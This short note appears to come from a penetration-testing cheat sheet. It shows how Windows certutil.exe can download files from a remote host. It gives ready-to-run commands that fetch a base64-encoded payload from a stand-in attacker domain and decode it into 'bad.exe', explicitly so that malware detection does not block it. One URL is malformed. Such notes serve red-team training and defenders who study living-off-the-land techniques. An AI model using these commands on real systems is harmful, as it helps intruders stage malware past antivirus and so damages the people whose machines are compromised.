Certutil.exe can be used to download a file to a Windows machine.
This command will download the «file» in the Windows machine from «http://<ip>«
certutil.exe -urlcache -split -f http:///file file
Depending on the file, it could be detected as malicious and then be blocked.
The trick is based on a base64 encoding file when sending the file.
Once received the file will just need to decoded to obtain the original file.
C:\Temp>certutil.exe -urlcache -split -f «https://hackers.home/badcontent.txt» bad.txt
C:\Temp>certutil.exe -decode bad.txt bad.exe